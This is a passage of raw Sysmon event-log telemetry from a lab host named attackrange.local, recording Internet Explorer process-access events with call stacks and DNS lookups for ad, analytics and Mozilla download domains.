RAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.547{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.547{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.519{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.503{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.503{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.499{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.103{59A5CD1D-9410-6005-0E05-00000000A301}6584ad.doubleclick.net0type: 5 dart.l.doubleclick.net;::ffff:216.58.212.134;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.099{59A5CD1D-9410-6005-0E05-00000000A301}6584www.google-analytics.com0type: 5 www-google-analytics.l.google.com;::ffff:216.58.205.238;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:35.434{59A5CD1D-8E56-6005-2E00-00000000A301}2464134.212.58.216.in-addr.arpa.0type: 12 fra16s46-in-f6.1e100.net;type: 12 ams15s21-in-f134.1e100.net;type: 12 ams15s21-in-f6.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000013809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:35.434{59A5CD1D-8E56-6005-2E00-00000000A301}2464238.205.58.216.in-addr.arpa.0type: 12 fra15s24-in-f238.1e100.net;type: 12 fra15s24-in-f14.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000013808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.233{59A5CD1D-9410-6005-0E05-00000000A301}6584adservice.google.de0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.168{59A5CD1D-9410-6005-0E05-00000000A301}6584adservice.google.com0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.22.66;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:37.037{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:37.006{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:37.006{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:37.006{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+28a83e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+286255(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+28a443(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+29675d(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1971c3(wow64)|C:\Windows\SYSTEM32\urlmon.dll+4f0b8(wow64) 22542200x800000000000000013813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:35.443{59A5CD1D-8E56-6005-2E00-00000000A301}246466.22.217.172.in-addr.arpa.0type: 12 fra15s17-in-f66.1e100.net;type: 12 fra15s17-in-f2.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000013812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:38.255{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:38.255{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000013819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:39.912{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:39.896{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:39.896{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:39.896{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.851{59A5CD1D-9410-6005-0E05-00000000A301}6584download-installer.cdn.mozilla.net0type: 5 dn6m9t4qll5h.cloudfront.net;::ffff:13.224.189.56;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.543{59A5CD1D-9410-6005-0E05-00000000A301}6584download.mozilla.org0type: 5 bouncer-bouncer-elb.prod.mozaws.net;::ffff:18.205.79.132;::ffff:100.24.193.114;::ffff:3.94.27.216;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:40.630{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+832f|C:\Windows\SYSTEM32\IEFRAME.dll+e5166|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000013823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:40.630{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+832f|C:\Windows\SYSTEM32\IEFRAME.dll+e5166|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000013822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:40.630{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+601d|C:\Windows\SYSTEM32\IEFRAME.dll+832f|C:\Windows\SYSTEM32\IEFRAME.dll+e5166|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 22542200x800000000000000013821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:38.496{59A5CD1D-8E56-6005-2E00-00000000A301}2464132.79.205.18.in-addr.arpa.0type: 12 ec2-18-205-79-132.compute-1.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000013820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:38.495{59A5CD1D-8E56-6005-2E00-00000000A301}246456.189.224.13.in-addr.arpa.0type: 12 server-13-224-189-56.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 10341000x800000000000000013833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+6dbf2|C:\Windows\SYSTEM32\IEFRAME.dll+6885|C:\Windows\SYSTEM32\IEFRAME.dll+62cf|C:\Windows\SYSTEM32\IEFRAME.dll+1a1666|C:\Windows\SYSTEM32\IEFRAME.dll+65e1|C:\Windows\SYSTEM32\IEFRAME.dll+5ea7|C:\Windows\SYSTEM32\IEFRAME.dll+831a|C:\Windows\SYSTEM32\IEFRAME.dll+160b0d|C:\Windows\SYSTEM32\IEFRAME.dll+e5191|C:\Windows\SYSTEM32\IEFRAME.dll+57e1f|C:\Windows\SYSTEM32\IEFRAME.dll+57d00|C:\Windows\SYSTEM32\IEFRAME.dll+52c0c|C:\Windows\SYSTEM32\IEFRAME.dll+5097c|C:\Windows\SYSTEM32\IEFRAME.dll+314c5a|C:\Windows\SYSTEM32\IEFRAME.dll+d2e36|C:\Windows\SYSTEM32\IEFRAME.dll+d1f16 10341000x800000000000000013832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:41.646{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 